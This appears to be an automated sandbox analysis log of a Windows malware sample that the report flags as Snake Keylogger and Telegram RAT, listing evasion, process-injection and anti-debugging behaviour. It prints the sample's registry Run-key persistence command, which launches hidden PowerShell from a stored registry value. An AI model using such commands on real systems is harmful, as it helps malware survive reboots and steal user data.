Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598117	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597774	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597434	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597101	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596102	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595872	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595348	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594233	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594125	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6149	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Window / User API: threadDelayed 3788	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Window / User API: threadDelayed 6044	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

API coverage: 2.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192	Thread sleep count: 3788 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192	Thread sleep count: 6044 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599771s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599652s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599534s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599401s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598947s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598837s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598680s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598117s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597774s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597434s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597101s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596327s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596102s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595872s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595655s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595348s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594233s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594125s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_0040615C FindFirstFileW,FindClose,	0_2_0040615C
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004056A1
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0040615C FindFirstFileW,FindClose,	6_2_0040615C
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00402770 FindFirstFileW,	6_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_004056A1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599771	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599652	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599534	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599401	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598837	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598117	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597774	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597434	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597101	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596102	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595872	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595348	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594233	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594125	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dcad4b8239f5aa<
Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Torpernes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Torpernes.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

Process queried: DebugPort

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

Code function: 6_2_00403B4F SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,SendMessageW,GetDlgItem,ShowWindow,EnableWindow,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,

6_2_00403B4F

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406183

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 1720000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 19FFF4			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "crisscrossing" /t reg_expand_sz /d "%isomerous% -windowstyle minimized $livsopsving=(get-itemproperty -path 'hkcu:\deponeringspladsen\').sknhedsplejes;%isomerous% ($livsopsving)"
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "crisscrossing" /t reg_expand_sz /d "%isomerous% -windowstyle minimized $livsopsving=(get-itemproperty -path 'hkcu:\deponeringspladsen\').sknhedsplejes;%isomerous% ($livsopsving)"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Contentious.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_00405E3B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405E3B

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Yara detected Telegram RAT

